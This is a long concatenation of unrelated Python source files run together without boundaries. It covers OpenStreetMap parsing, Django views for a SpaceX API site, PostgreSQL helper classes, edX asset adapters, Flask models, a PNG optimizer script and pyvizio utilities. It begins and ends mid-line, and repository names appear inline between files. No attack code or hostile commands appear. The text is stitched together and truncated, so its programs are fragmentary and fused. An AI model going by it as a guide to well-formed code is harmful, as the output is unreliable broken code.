\t\r\n]') def key_type(element, keys): if element.tag == "tag": k = element.attrib['k'] if re.search(lower,k): keys["lower"] += 1 elif re.search(lower_colon,k): keys["lower_colon"] += 1 elif re.search(problemchars,k): keys["problemchars"] += 1 else: keys["other"] += 1 return keys def process_map(filename): keys = {"lower": 0, "lower_colon": 0, "problemchars": 0, "other": 0} for _, element in ET.iterparse(filename): keys = key_type(element, keys) return keys def test(): keys = process_map('san-jose_california.osm') pprint.pprint(keys) if __name__ == "__main__": test()#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Sun Dec 9 12:33:12 2018 @author: vadim """ import numpy as np def func(point): x, y = point #return (1-x) ** 2 + 100 * (y - x ** 2) ** 2 # Rosenbrog #return (x ** 2 + y - 11) ** 2 + (x + y ** 2 - 7) ** 2 # Himmelblau nagasudhirpulla/guj_sced_inp_load import datetime as dt from typing import List, Tuple import psycopg2 from src.typeDefs.smpRow import ISmpRow class SmpRepo(): def __init__(self, dbHost: str, dbname: str, uname: str, dbPass: str) -> None: self.dbHost = dbHost self.dbname = dbname self.uname = uname self.dbPass = dbPass def insertSmp(self, smpRows: List[ISmpRow]) -> bool: dbConn = None isInsertSuccess = True try: # get the connection object dbConn = psycopg2.connect(host=self.dbHost, dbname=self.dbname, user=self.uname, password=self.dbPass) # get cursor for raw data table dbCur = dbConn.cursor() # create sql for insertion dataInsertionTuples: List[Tuple] = [(x["regTag"], dt.datetime.strftime(x["dataTime"], "%Y-%m-%d %H:%M:%S"), x["smpVal"], x["rev"]) for x in smpRows] dataText = ','.join(dbCur.mogrify('(%s,%s,%s,%s)', row).decode( "utf-8") for row in dataInsertionTuples) sqlTxt = 'INSERT INTO public.smp_data(\ region_tag, data_time, smp_val, rev)\ VALUES {0} on conflict (region_tag, data_time, rev) \ do update set smp_val = excluded.smp_val'.format(dataText) # execute the sql to perform insertion dbCur.execute(sqlTxt) # commit the changes dbConn.commit() except Exception as e: isInsertSuccess = False print('Error while bulk insertion of SMP values into db') print(e) finally: # closing database connection and cursor if(dbConn): # close the cursor object to avoid memory leaks dbCur.close() # close the connection object also dbConn.close() return isInsertSuccess def getSmp(self, regTag: str, revisionNum: int, startTime: dt.datetime, endTime: dt.datetime) -> List[ISmpRow]: smpObjs: List[ISmpRow] = [] try: # get the connection object conn = psycopg2.connect(host=self.dbHost, dbname=self.dbname, user=self.uname, password=self.dbPass) # get the cursor from connection cur = conn.cursor() # create the query postgreSQL_select_Query = "select data_time, smp_val from public.smp_data where region_tag=%s and rev=%s and (data_time between %s and %s) order by data_time" # execute the query cur.execute(postgreSQL_select_Query, (regTag, revisionNum, startTime, endTime)) # fetch all the records from cursor records = cur.fetchall() # iterate through all the fetched records for rowIter in range(len(records)): dbRow = records[rowIter] smpObj: ISmpRow = { "dataTime": dbRow[0], "smpVal": dbRow[1], "regTag": regTag, "rev": revisionNum } smpObjs.append(smpObj) except (Exception, psycopg2.Error) as error: print("Error while fetching data from PostgreSQL", error) smpObjs = [] finally: # closing database connection and cursor if(conn): # close the cursor object to avoid memory leaks cur.close() # close the connection object also conn.close() return smpObjs 0 # HOW TO # 
https://docs.djangoproject.com/en/1.10/howto/custom-management-commands/ # python manage.py cmd_subjects_optimize import sys from django.core.management.base import BaseCommand from dbpedialinks.models import * from myutils.myutils import * class Command(BaseCommand): help = 'command to calc tot counts for tags / so to make tagcloud faster' def handle(self, *args, **options): # change True/False as needed.. if False: # 1: cache the total count tot = DBPediaEntity.objects.count() counter = 0 for x in DBPediaEntity.objects.all(): counter += 1 x.update_tot_count() print("{}/{} - {}".format(counter, tot, x.title)) print("Done - objects created!") if True: tot = DBPediaEntity.objects.count() counter = 0 for x in DBPediaEntity.objects.all(): counter += 1 print("{}/{} - {}".format(counter, tot, x.title)) x.related_subjects(size=10, CACHE=True) print("Done - objects created!") def max_ones(arr): max = 0 count = 0 for i in arr: if i == 1: count += 1 if count > max: max = count if i == 0: count = 0 return max osoco/better-ways-of-thinking-about-softwarePart-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/olx_rest_api/adapters.py """ Helpers required to adapt to differing APIs """ from contextlib import contextmanager import logging import re from opaque_keys import InvalidKeyError from opaque_keys.edx.keys import AssetKey, CourseKey from fs.memoryfs import MemoryFS from fs.wrapfs import WrapFS from common.djangoapps.static_replace import replace_static_urls from xmodule.contentstore.content import StaticContent from xmodule.assetstore.assetmgr import AssetManager from xmodule.modulestore.django import modulestore as store from xmodule.modulestore.exceptions import ItemNotFoundError from xmodule.exceptions import NotFoundError from xmodule.xml_module import XmlParserMixin log = logging.getLogger(__name__) def get_block(usage_key): """ Return an XBlock from modulestore. """ return store().get_item(usage_key) def get_asset_content_from_path(course_key, asset_path): """ Locate the given asset content, load it into memory, and return it. Returns None if the asset is not found. """ try: asset_key = StaticContent.get_asset_key_from_path(course_key, asset_path) return AssetManager.find(asset_key) except (ItemNotFoundError, NotFoundError): return None def rewrite_absolute_static_urls(text, course_id): """ Convert absolute URLs like https://studio-site.opencraft.hosting/asset-v1:LabXchange+101+2019+type@asset+block@SCI_1.2_Image_.png to the proper /static/SCI_1.2_Image_.png format for consistency and portability. """ assert isinstance(course_id, CourseKey) asset_full_url_re = r'https?://[^/]+/(?P[^\s\'"&]+)' def check_asset_key(match_obj): """ If this URL's path part is an AssetKey from the same course, rewrite it. """ try: asset_key = AssetKey.from_string(match_obj.group('maybe_asset_key')) except InvalidKeyError: return match_obj.group(0) # Not an asset key; do not rewrite if asset_key.course_key == course_id: return '/static/' + asset_key.path # Rewrite this to portable form else: return match_obj.group(0) # From a different course; do not rewrite return re.sub(asset_full_url_re, check_asset_key, text) def collect_assets_from_text(text, course_id, include_content=False): """ Yield dicts of asset content and path from static asset paths found in the given text. Make sure to have replaced the URLs with rewrite_absolute_static_urls first. 
If include_content is True, the result will include a contentstore StaticContent file object which wraps the actual binary content of the file. """ # Replace static urls like '/static/foo.png' static_paths = [] # Drag-and-drop-v2 has # "&quot;/static/blah.png&quot;" # which must be changed to "/static/blah.png" for replace_static_urls to work: text2 = text.replace("&quot;", '"') replace_static_urls(text=text2, course_id=course_id, static_paths_out=static_paths) for (path, uri) in static_paths: if path.startswith('/static/'): path = path[8:] info = { 'path': path, 'url': '/' + str(StaticContent.compute_location(course_id, path)), } if include_content: content = get_asset_content_from_path(course_id, path) if content is None: log.error("Static asset not found: (%s, %s)", path, uri) else: info['content'] = content yield info @contextmanager def override_export_fs(block): """ Hack required for some legacy XBlocks which inherit XModuleDescriptor.add_xml_to_node() instead of the usual XmlSerializationMixin.add_xml_to_node() method. This method temporarily replaces a block's runtime's 'export_fs' system with an in-memory filesystem. This method also abuses the XmlParserMixin.export_to_file() API to prevent the XModule export code from exporting each block as two files (one .olx pointing to one .xml file). The export_to_file was meant to be used only by the customtag XModule but it makes our lives here much easier. """ fs = WrapFS(MemoryFS()) fs.makedir('course') fs.makedir('course/static') # Video XBlock requires this directory to exist, to put srt files etc. old_export_fs = block.runtime.export_fs block.runtime.export_fs = fs if hasattr(block, 'export_to_file'): old_export_to_file = block.export_to_file block.export_to_file = lambda: False old_global_export_to_file = XmlParserMixin.export_to_file XmlParserMixin.export_to_file = lambda _: False # So this applies to child blocks that get loaded during export yield fs block.runtime.export_fs = old_export_fs if hasattr(block, 'export_to_file'): block.export_to_file = old_export_to_file XmlParserMixin.export_to_file = old_global_export_to_file ghaith96/exercism-python def response(hey_bob: str): hey_bob = hey_bob.strip() if hey_bob.isupper() and hey_bob.endswith("?"): return "Calm down, I know what I'm doing!" if hey_bob.endswith("?"): return "Sure." if hey_bob.isupper(): return "Whoa, chill out!" if hey_bob.isspace() or len(hey_bob) == 0: return "Fine. Be that way!" return "Whatever." from project import db from project import bcrypt from sqlalchemy import ForeignKey from sqlalchemy.orm import relationship class BlogPost(db.Model): __tablename__ = "posts" id = db.Column(db.Integer, primary_key=True) title = db.Column(db.String, nullable=False) description = db.Column(db.String, nullable=False) author_id = db.Column(db.Integer, ForeignKey('users.id')) def __init__(self, title, description, author_id): self.title = title self.description = description self.author_id = author_id def __repr__(self): return '<title {}>'.format(self.title) class User(db.Model): __tablename__ = "users" id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String, nullable=False) email = db.Column(db.String, nullable=False) password = db.Column(db.String, nullable=False) posts = relationship("BlogPost", backref="poster") def __init__(self, name, email, password): self.name = name self.email = email self.password = bcrypt.generate_password_hash(password) def is_authenticated(self): return True def is_active(self): return True def is_anonymous(self): return False def get_id(self): return unicode(self.id) def __repr__(self): return '<name - {}>'.format(self.name) #!/usr/bin/env python # Copyright (c) 2014-2016 The Harzcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. ''' Run this script every time you change one of the png files.
Using pngcrush, it will optimize the png files, remove various color profiles, remove ancillary chunks (alla) and text chunks (text). #pngcrush -brute -ow -rem gAMA -rem cHRM -rem iCCP -rem sRGB -rem alla -rem text ''' import os import sys import subprocess import hashlib from PIL import Image def file_hash(filename): '''Return hash of raw file contents''' with open(filename, 'rb') as f: return hashlib.sha256(f.read()).hexdigest() def content_hash(filename): '''Return hash of RGBA contents of image''' i = Image.open(filename) i = i.convert('RGBA') data = i.tobytes() return hashlib.sha256(data).hexdigest() pngcrush = 'pngcrush' git = 'git' folders = ["src/qt/res/movies", "src/qt/res/icons", "share/pixmaps"] basePath = subprocess.check_output([git, 'rev-parse', '--show-toplevel']).rstrip('\n') totalSaveBytes = 0 noHashChange = True outputArray = [] for folder in folders: absFolder=os.path.join(basePath, folder) for file in os.listdir(absFolder): extension = os.path.splitext(file)[1] if extension.lower() == '.png': print("optimizing "+file+"..."), file_path = os.path.join(absFolder, file) fileMetaMap = {'file' : file, 'osize': os.path.getsize(file_path), 'sha256Old' : file_hash(file_path)} fileMetaMap['contentHashPre'] = content_hash(file_path) pngCrushOutput = "" try: pngCrushOutput = subprocess.check_output( [pngcrush, "-brute", "-ow", "-rem", "gAMA", "-rem", "cHRM", "-rem", "iCCP", "-rem", "sRGB", "-rem", "alla", "-rem", "text", file_path], stderr=subprocess.STDOUT).rstrip('\n') except: print "pngcrush is not installed, aborting..." sys.exit(0) #verify if "Not a PNG file" in subprocess.check_output([pngcrush, "-n", "-v", file_path], stderr=subprocess.STDOUT): print "PNG file "+file+" is corrupted after crushing, check out pngcursh version" sys.exit(1) fileMetaMap['sha256New'] = file_hash(file_path) fileMetaMap['contentHashPost'] = content_hash(file_path) if fileMetaMap['contentHashPre'] != fileMetaMap['contentHashPost']: print "Image contents of PNG file "+file+" before and after crushing don't match" sys.exit(1) fileMetaMap['psize'] = os.path.getsize(file_path) outputArray.append(fileMetaMap) print("done\n"), print "summary:\n+++++++++++++++++" for fileDict in outputArray: oldHash = fileDict['sha256Old'] newHash = fileDict['sha256New'] totalSaveBytes += fileDict['osize'] - fileDict['psize'] noHashChange = noHashChange and (oldHash == newHash) print fileDict['file']+"\n size diff from: "+str(fileDict['osize'])+" to: "+str(fileDict['psize'])+"\n old sha256: "+oldHash+"\n new sha256: "+newHash+"\n" print "completed. Checksum stable: "+str(noHashChange)+". Total reduction: "+str(totalSaveBytes)+" bytes" # -*- coding: utf-8 -*- from numpy import cosh, sinh, ndarray, argwhere, isnan as np_isnan from math import isnan def BH_func(self, H, Bs, a): """ Return the B from H according to Langevin model. 
Parameters ---------- self : ModelBH_Langevin a ModelBH_Langevin object Returns ------- B: numpy.ndarray B(H) values """ B = Bs * (cosh(H / a) / sinh(H / a) - a / H) if isinstance(B, ndarray): B[argwhere(np_isnan(B))] = Bs B[argwhere(H == 0)] = 0 elif isnan(B): if H == 0: B = 0 else: B = Bs return B from slides_configuration import * response = slides_api.get_document_properties("test.pptx") print(response)from django.shortcuts import render,HttpResponse,HttpResponseRedirect import requests from datetime import datetime from django.urls import reverse from .models import * base_link = "https://api.spacexdata.com/v3/" def updateLaunches(): response = requests.get(base_link + "launches") json_object = response.json() launch_details = [] for item in json_object: new_launch = {} new_launch.update({"flight_number":item["flight_number"]}) timestamp = item["launch_date_unix"] dt_object = datetime.strftime(datetime.fromtimestamp(timestamp),"%Y-%m-%d") new_launch.update({"launch_date":dt_object}) new_launch.update({"rocket_name":item["rocket"]["rocket_name"]}) new_launch.update({"mission_patch_link":item["links"]["mission_patch_small"]}) new_launch.update({"reddit_launch":item["links"]["reddit_launch"]}) new_launch.update({"video_link":item["links"]["video_link"]}) new_launch.update({"wikipedia":item["links"]["wikipedia"]}) new_launch.update({"article_link":item["links"]["article_link"]}) new_launch.update({"details":item["details"]}) new_launch.update({"launch_success":item["launch_success"]}) if Launches.objects.filter(flight_number=new_launch.get("flight_number")).exists(): l = Launches.objects.filter(flight_number=new_launch.get("flight_number")).update(**new_launch) else: l = Launches(**new_launch) l.save() def updateMissions(): response = requests.get(base_link + "missions") json_object = response.json() mission_details = [] for item in json_object: new_mission = {} new_mission.update({"mission_name":item["mission_name"]}) new_mission.update({"mission_id":item["mission_id"]}) new_mission.update({"wikipedia":item["wikipedia"]}) new_mission.update({"twitter":item["twitter"]}) new_mission.update({"website":item["website"]}) new_mission.update({"description":item["description"]}) if Mission.objects.filter(mission_id=new_mission.get("mission_id")).exists(): m = Mission.objects.filter(mission_id=new_mission.get("mission_id")).update(**new_mission) else: m = Mission(**new_mission) m.save() def updateCores(): response = requests.get(base_link + "cores") json_object = response.json() core_details = [] for item in json_object: new_core = {} new_core.update({"core_serial":item["core_serial"]}) timestamp = item["original_launch_unix"] if timestamp != None: dt_object = datetime.strftime(datetime.fromtimestamp(timestamp),"%Y-%m-%d") new_core.update({"launch_date":dt_object}) new_core.update({"mission_name":item["missions"][0]["name"]}) new_core.update({"mission_flight":item["missions"][0]["flight"]}) new_core.update({"details":item["details"]}) if Core.objects.filter(core_serial=new_core.get("core_serial")).exists(): m = Core.objects.filter(core_serial=new_core.get("core_serial")).update(**new_core) else: m = Core(**new_core) m.save() def updateRockets(): response = requests.get(base_link + "rockets") json_object = response.json() rocket_details = [] for item in json_object: new_rocket = {} new_rocket.update({"rocket_number":item["id"]}) new_rocket.update({"active":item["active"]}) new_rocket.update({"cost_per_launch":item["cost_per_launch"]}) new_rocket.update({"country":item["country"]}) 
new_rocket.update({"wikipedia":item["wikipedia"]}) new_rocket.update({"rocket_id":item["rocket_id"]}) new_rocket.update({"description":item["description"]}) new_rocket.update({"rocket_name":item["rocket_name"]}) first_flight = datetime.strptime(item["first_flight"],"%Y-%m-%d") new_rocket.update({"first_flight":first_flight}) if Rocket.objects.filter(rocket_id=new_rocket.get("rocket_id")).exists(): m = Rocket.objects.filter(rocket_id=new_rocket.get("rocket_id")).update(**new_rocket) else: m = Rocket(**new_rocket) m.save() def home(request): latest_launch = Launches.objects.filter(launch_date__lte=datetime.now()).last() next_launch = Launches.objects.filter(launch_date__gte=datetime.now()).first() context = { 'latest': latest_launch, 'next': next_launch, } return render(request,"home.html",context) def allLaunches(request): no = Launches.objects.first().id return HttpResponseRedirect(reverse('main:launches',kwargs={'no':no,'category':"all"})) def launchesPast(request): no = Launches.objects.filter(launch_success__isnull=False).first().id return HttpResponseRedirect(reverse('main:launches',kwargs={'no':no,'category':"past"})) def launchesUpcoming(request): no = Launches.objects.filter(launch_success__isnull=True).first().id return HttpResponseRedirect(reverse('main:launches',kwargs={'no':no,'category':"upcoming"})) def launches(request,category,no): if request.method == "POST": if 'refresh' in request.POST: updateLaunches() return HttpResponseRedirect(reverse('main:launches',kwargs={'no':no,'category':category})) elif 'filter' in request.POST: category = request.POST['category'] if category=="upcoming": return HttpResponseRedirect(reverse('main:launchesUpcoming')) elif category=="past": return HttpResponseRedirect(reverse('main:launchesPast')) else: return HttpResponseRedirect(reverse('main:allLaunches')) if category=="all": launch_details = Launches.objects.all() elif category=="upcoming": launch_details = Launches.objects.filter(launch_success__isnull=True) elif category=="past": launch_details = Launches.objects.filter(launch_success__isnull=False) current_launch = launch_details.filter(id=no)[0] context = { 'launch_details': launch_details, 'current':current_launch, 'no':no, 'category':category, } return render(request,"launches.html",context) def allMissions(request): no = Mission.objects.first().id return HttpResponseRedirect(reverse('main:missions',kwargs={'no':no})) def missions(request,no): if request.method == "POST": updateMissions() return HttpResponseRedirect(reverse('main:missions',kwargs={'no':no})) mission_details = Mission.objects.all() current_mission = Mission.objects.filter(id=no)[0] context = { 'mission_details': mission_details, 'current':current_mission, 'no':no, } return render(request,"missions.html",context) def allCores(request): no = Mission.objects.first().id return HttpResponseRedirect(reverse('main:cores',kwargs={'no':no})) def cores(request,no): if request.method == "POST": updateCores() return HttpResponseRedirect(reverse('main:cores',kwargs={'no':no})) core_details = Core.objects.all() current_core = Core.objects.filter(id=no)[0] context = { 'core_details': core_details, 'current':current_core, 'no':no, } return render(request,"cores.html",context) def allRockets(request): updateRockets() no = Mission.objects.first().id return HttpResponseRedirect(reverse('main:rockets',kwargs={'no':no})) def rockets(request,no): if request.method == "POST": updateRockets() return HttpResponseRedirect(reverse('main:rockets',kwargs={'no':no})) rocket_details = 
Rocket.objects.all() current_rocket = Rocket.objects.filter(id=no)[0] context = { 'rocket_details': rocket_details, 'current':current_rocket, 'no':no, } return render(request,"rockets.html",context)from src.db.db import Base from sqlalchemy import Column, String, Integer, BigInteger class NotifyUserList(Base): __tablename__ = 'notify_user_list' id = Column(Integer, primary_key=True) discord_username = Column(String, nullable=False) mention = Column(String, nullable=False) github_username = Column(String, nullable=False) def __init__(self, discord_username: str, github_username: str, mention: str): self.discord_username = discord_username self.github_username = github_username self.mention = mention def __repr__(self) -> str: return f'NotifyUserList({self.discord_username}, {self.github_username})' class NotifyChannelList(Base): __tablename__ = 'notify_channel_list' id = Column(Integer, primary_key=True) discord_channel = Column(BigInteger, nullable=False) github_username = Column(String, nullable=False) github_repo = Column(String, nullable=False) def __init__(self, discord_channel: int, github_username: str, github_repo: str) -> None: self.github_username = github_username self.discord_channel = discord_channel self.github_repo = github_repo def __repr__(self) -> str: return f'NotifyChannelList({self.github_repo}, {self.discord_channel})' from rubrix.server.apis.v0.models.metrics.token_classification import ( MentionMetrics, TokenMetrics, TokenTagMetrics, ) from rubrix.server.elasticseach.mappings.helpers import mappings from rubrix.server.elasticseach.query_helpers import nested_mappings_from_base_model def mentions_mappings(): return { "type": "nested", "properties": { "mention": mappings.keyword_field(), "entity": mappings.keyword_field(), "score": mappings.decimal_field(), }, } def token_classification_mappings(): metrics_mentions_mappings = nested_mappings_from_base_model(MentionMetrics) metrics_tags_mappings = nested_mappings_from_base_model(TokenTagMetrics) _mentions_mappings = mentions_mappings() # TODO: remove return { "_source": mappings.source( excludes=[ # "words", # Cannot be exclude since comment text_length metric is computed using this source fields "predicted", "predicted_as", "predicted_by", "annotated_as", "annotated_by", "score", "predicted_mentions", "mentions", ] ), "properties": { "predicted": mappings.keyword_field(), "annotated_as": mappings.keyword_field(enable_text_search=True), "predicted_as": mappings.keyword_field(enable_text_search=True), "score": {"type": "float"}, "predicted_mentions": _mentions_mappings, # TODO: remove "mentions": _mentions_mappings, # TODO: remove "tokens": mappings.keyword_field(), "metrics.tokens": nested_mappings_from_base_model(TokenMetrics), "metrics.predicted.mentions": metrics_mentions_mappings, "metrics.annotated.mentions": metrics_mentions_mappings, "metrics.predicted.tags": metrics_tags_mappings, "metrics.annotated.tags": metrics_tags_mappings, }, } # Copyright 2019 IBM Corporation All Rights Reserved. # # SPDX-License-Identifier: Apache-2.0 # pythonspot.com from flask import Flask, render_template, flash, request from wtforms import Form, TextField, TextAreaField, validators, StringField, SubmitField import os from redisUtils import RedisStream # App config. 
DEBUG = True #static_folder='/opt/static' #template_folder="/opt/templates" app = Flask(__name__) app.config.from_object(__name__) app.config['SECRET_KEY'] = os.urandom(12) redis_queue = os.environ.get('WAIT_QUEUE', "demo_wait_q_0") r = RedisStream() class ReusableForm(Form): task = TextField('Task:', validators=[validators.required(), validators.Length(min=1)]) @app.route("/", methods=['GET', 'POST']) def run(): form = ReusableForm(request.form) print(form.errors) if request.method == 'POST': task=request.form['task'] print(task) if form.validate(): # Save the comment here. flash('Thanks for your task: ' + task) r.pushTask(redis_queue, task) else: flash('Error: WTF is your task?') return render_template('form.html', form=form) def main(): app.run(host='0.0.0.0') if __name__ == "__main__": main() from aiogram.dispatcher import Dispatcher from aiogram.contrib.fsm_storage.redis import RedisStorage2 from src.tg.zverobot import ZveroBot from src.config import Config cfg = Config() cfg.with_env() storage = RedisStorage2(host="redis-local") bot = ZveroBot(cfg) dp = Dispatcher(bot, storage=storage) <gh_stars>10-100 """pyvizio utility module.""" import json from typing import Any, Dict, List, Optional, Union from aiohttp import ClientError, ClientSession from pyvizio.util.const import ( APK_SOURCE_PATH, APP_NAMES_FILE, APP_NAMES_URL, APP_PAYLOADS_FILE, APP_PAYLOADS_URL, RESOURCE_PATH, ) async def gen_apps_list_from_url( app_names_url: str = APP_NAMES_URL, app_payloads_url: str = APP_PAYLOADS_URL, session: ClientSession = None, ) -> Optional[List[Dict[str, Union[str, List[Union[str, Dict[str, Any]]]]]]]: """Get app JSON files from external URLs and return list of apps for use in pyvizio.""" headers = {"Content-Type": "application/json"} try: if session: response = await session.get( app_names_url, headers=headers, raise_for_status=True ) app_names = await response.json(content_type=None) response = await session.get( app_payloads_url, headers=headers, raise_for_status=True ) app_configs = await response.json(content_type=None) else: async with ClientSession() as local_session: response = await local_session.get( app_names_url, headers=headers, raise_for_status=True ) app_names = await response.json(content_type=None) response = await local_session.get( app_payloads_url, headers=headers, raise_for_status=True ) app_configs = await response.json(content_type=None) return gen_apps_list(app_names, app_configs) except ClientError: return None def gen_apps_list_from_src( apk_source_path: str = APK_SOURCE_PATH, resource_path: str = RESOURCE_PATH ) -> List[Dict[str, Union[str, List[Union[str, Dict[str, Any]]]]]]: """Parse JSON from VizioCast Android app source in `apk_source_path`/`resource_path` and return list of apps for use in pyvizio.""" base_path = f"{apk_source_path}/{resource_path}" app_names_filepath = f"{base_path}/{APP_NAMES_FILE}" app_configs_filepath = f"{base_path}/{APP_PAYLOADS_FILE}" with open(app_names_filepath) as f: app_names = json.load(f) with open(app_configs_filepath) as f: app_configs = json.load(f) return gen_apps_list(app_names, app_configs) def gen_apps_list( app_names: List[Dict[str, Any]], app_configs: List[Dict[str, Any]] ) -> List[Dict[str, Union[str, List[Union[str, Dict[str, Any]]]]]]: """Parse list of app names and app configs and return list of apps for use in pyvizio.""" pyvizio_apps: List[Dict[str, Union[str, List[Union[str, Dict[str, Any]]]]]] = [] for app_name in app_names: # returns first app where condition is true app_config = next( ( app_config for app_config in 
app_configs if app_config["id"] == app_name["id"] ) ) if app_config: config_json = app_config["chipsets"]["*"][0]["app_type_payload"] config = json.loads(config_json) app_already_exists = False for pyvizio_app in pyvizio_apps: if pyvizio_app["name"].lower() == app_name["name"].lower(): pyvizio_app["id"].append(app_name["id"]) pyvizio_app["config"].append(config) app_already_exists = True break if not app_already_exists: pyvizio_apps.append( { "name": app_name["name"], "country": [country.lower() for country in app_name["country"]], "id": [app_name["id"]], "config": [config], } ) return pyvizio_apps <filename>cgm/inference/__init__.py<gh_stars>1-10 from .belief_propagation import * from .variable_elimination import * from .forward_sampling import *from py_compile import compile from os import path if __name__ == '__main__': destination = path.realpath(path.curdir)+'/WallpaperChanger.pyc' print('Destination: %s' % destination) compile('main.py', destination) from setuptools import setup, find_packages setup( name='nameko-clutch', version='0.1-alpha', description='@TODO', long_description='@TODO', author='<NAME>', author_email='<EMAIL>', url='https://github.com/NJoyX/nameko-clutch', license='Apache License, Version 2.0', packages=find_packages(), install_requires=[ "nameko", "six" ], extras_require={}, include_package_data=True, zip_safe=False, keywords=['nameko', 'cluster', 'distributed'], classifiers=[ "Operating System :: MacOS :: MacOS X", "Operating System :: POSIX", 'Programming Language :: Python', 'Programming Language :: Python :: 2.7', "Topic :: Internet", "Topic :: Software Development :: Libraries :: Python Modules", "Intended Audience :: Developers", ] ) # -*- coding: utf-8 -*- from __future__ import print_function import sys import csv import json import os.path from datetime import datetime import psycopg2 import psycopg2.extras #import csv_unicode class DatabaseTweaker: @classmethod def tweaker_from_connection( cls, dbname, host, port, user, password, debug=None ): postgres_connection = "dbname='" + dbname + "'" \ + " host='" + host + "' port='" + port + "'" \ + " user='" + user + "' password='" + password + "'" dt = cls( postgres_connection, debug ) return dt def __init__( self, connection=None, debug=False ): self.debug = False self.set_debug(debug) self.connection = self.cursor = None if connection: self.connect_to_postres(connection) # e.g. "dbname='<HERE>' user='<HERE>' host='<HERE>' password='<HERE>'" self._reset_audit() self.user = "cofkbot" self.schema = None def _reset_audit(self): self.audit = { "deletions" : {}, "insertions" : {}, "updates" : {} } def set_debug(self, debug): self.debug = debug if debug: print( "Debug ON - printing SQL" ) def connect_to_postres(self, connection): try: self.connection = psycopg2.connect( connection ) except: print( "ERROR: I am unable to connect to the database" ) sys.exit(1) else: if self.debug : print( "Connected to database..." 
) self.cursor = self.connection.cursor(cursor_factory=psycopg2.extras.DictCursor) def close(self): self.connection.close() self.connection = self.cursor = None @staticmethod def get_csv_data( filename ): rows = [] with open( filename ) as file : csv_file = csv.DictReader( file, dialect=csv.excel ) for row in csv_file: rows.append( row ) return rows def get_work_from_iwork_id( self, iwork_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_work WHERE iwork_id=%s" command = self.cursor.mogrify( command, (int(iwork_id),) ) if self.debug : print( "* SELECT work:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_resource_from_resource_id( self, resource_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_resource WHERE resource_id=%s" command = self.cursor.mogrify( command, (resource_id,) ) if self.debug : print( "* SELECT resource:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_image_from_image_id( self, image_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_image WHERE image_id=%s" command = self.cursor.mogrify( command, (image_id,) ) if self.debug : print( "* SELECT image:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_comment_from_comment_id( self, comment_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_comment WHERE comment_id=%s" command = self.cursor.mogrify( command, (comment_id,) ) if self.debug : print( "* SELECT comment:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_institution_from_institution_id( self, institution_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_institution WHERE institution_id=%s" command = self.cursor.mogrify( command, (institution_id,) ) if self.debug : print( "* SELECT institution:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_location_from_location_id( self, location_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_location WHERE location_id=%s" command = self.cursor.mogrify( command, (location_id,) ) if self.debug : print( "* SELECT location:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_person_from_iperson_id( self, iperson_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_person WHERE iperson_id=%s" command = self.cursor.mogrify( command, (iperson_id,) ) if self.debug : print( "* SELECT person:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_manifestation_from_manifestation_id( self, manifestation_id ): self.check_database_connection() command = "SELECT * FROM cofk_union_manifestation WHERE manifestation_id=%s" command = self.cursor.mogrify( command, (manifestation_id,) ) if self.debug : print( "* SELECT manifestation:", command ) self.cursor.execute( command ) return self.cursor.fetchone() def get_relationships(self, id_from, table_from=None, table_to=None ): """ Use "table_from" and "table_to" to limit the results. :param id_from: Get relationships for this object :param table_from: limit to these type of tables on left (e.g. "cofk_union_work") :param table_to: limit to these type of tables on right (e.g. "cofk_union_work") :return: Use the returned "table_name" and "id_value" which represent the thing that is connected to the given id (id_from). 
""" self.check_database_connection() command = "SELECT * FROM cofk_union_relationship" if table_from : command += " WHERE ((left_id_value=%s and left_table_name=%s)" command += " or (right_id_value=%s and right_table_name=%s))" values = [ id_from, table_from, id_from, table_from ] else: command += " WHERE ((left_id_value=%s or right_id_value=%s))" values = [ id_from, id_from ] if table_to : command += " and (left_table_name=%s or right_table_name=%s)" values.extend( [ table_to, table_to ] ) command = self.cursor.mogrify( command, values ) if self.debug : print( "* SELECT relationships:", command ) self.cursor.execute( command ) results = self.cursor.fetchall() # Tweak the returns so we can see what is related without having to know if it's on the left or the right! simple_results = [] for result in results: # in some cases (i guess...) something could be related to itself, in this case the simple_result = dict(result) # Repeat the relation in own variables (otherwise it's not clear if you should take the right or left...) simple_result["table_name"] = result['left_table_name'] if table_from == result['right_table_name'] else result['right_table_name'] simple_result["id_value"] = result['left_id_value'] if id_from == result['right_id_value'] else result['right_id_value'] simple_results.append(simple_result) # simple_results.append( { # "relationship_id" : result['relationship_id'], # # "table_name" : result['left_table_name'] if table_from == result['right_table_name'] else result['right_table_name'] # "id_value" : result['left_id_value'] if id_from == result['right_id_value'] else result['right_table_name'], # # "relationship_type" : result["relationship_type"] # # }) return simple_results def update_person(self, person_id, field_updates={}, print_sql=False, anonymous=False ): self._update( person_id, field_updates, "cofk_union_person", "person_id", "person", print_sql, anonymous ) def update_person_from_iperson(self, iperson_id, field_updates={}, print_sql=False, anonymous=False ): self._update( iperson_id, field_updates, "cofk_union_person", "iperson_id", "person", print_sql, anonymous ) def update_work(self, work_id, field_updates={}, print_sql=False, anonymous=False ): self._update( work_id, field_updates, "cofk_union_work", "work_id", "work", print_sql, anonymous ) def update_work_from_iwork(self, iwork_id, field_updates={}, print_sql=False, anonymous=False ): self._update( iwork_id, field_updates, "cofk_union_work", "iwork_id", "work", print_sql, anonymous ) def update_manifestation(self, manifestation_id, field_updates={}, print_sql=False, anonymous=False ): self._update( manifestation_id, field_updates, "cofk_union_manifestation", "manifestation_id", "manifestation", print_sql, anonymous) def update_comment(self, comment_id, field_updates={}, print_sql=False, anonymous=False ): self._update( comment_id, field_updates, "cofk_union_comment", "comment_id", "comment", print_sql, anonymous ) def update_resource(self, resource_id, 